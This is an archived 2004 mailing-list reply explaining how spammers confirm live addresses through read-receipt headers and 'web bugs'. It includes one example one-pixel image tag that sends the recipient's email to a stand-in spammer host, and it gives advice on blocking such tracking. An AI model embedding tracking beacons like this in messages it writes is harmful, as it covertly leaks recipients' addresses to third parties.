[P1] anti-spam note

Larry Kollar kollar at alltel.net
Thu Jan 1 20:11:06 PST 2004


Don Hinkle wrote:

>>> How did it do this? Does that mean that when the email is opened, 
>>> that it somehow dispatches a notice back to the original sender?
>>
>> The first try may have been the web bug, a small one pixel invisible 
>> image that must be called from a server like any photo or graphic. 
>> When it is, it leaves behind the address of where it is going.
> and that means the spammer must send some agent into the server to 
> collect all those "live" addresses, and all an anti-spammer has to do 
> is track that agent bearing the loot...correct?

First off, many mail programs recognize a particular "confirmation" 
header and send a response to address in the "From" header to indicate 
that the user has at least opened the email. For this to work for a 
spammer, it has to put a working email address in there. Spammers 
usually hate to use anything but throwaway email addresses in their 
spams, since those generally get closed quickly. I'm not sure if 
Mail.app does anything with it, but Eudora gave you the option of 
allowing it to send the confirmation or not.

Second, a web bug is much more simple than you make it out to be & 
harder to track in the way you describe. It's basically an IMG element 
that looks something like this:

	<IMG height=1 width=1 
src="http://spammer.com/cgi-bin?tracker&email=you@example.com">

The URL is a site belonging to the spambag, so it can just periodically 
forward the web server logs to an email address on the same box or 
elsewhere -- the "elsewhere" is usually not going to be detectable 
unless someone cracks the spammer's server & looks at the CGI 
controlling the web bug, so it could either be a throwaway or a real 
account.

Turning off external image display, at the very least, is a good way to 
thwart web bugs. Best is to use a mailer that displays everything as 
text, the way the Good Lord intended email to be. :-)
--
Larry Kollar    k  o  l  l  a  r  @  a  l  l  t  e  l  .  n  e  t
"The hardest part of all this is the part that requires thinking."
-- Paul Tyson, on xml-doc 



More information about the iBook mailing list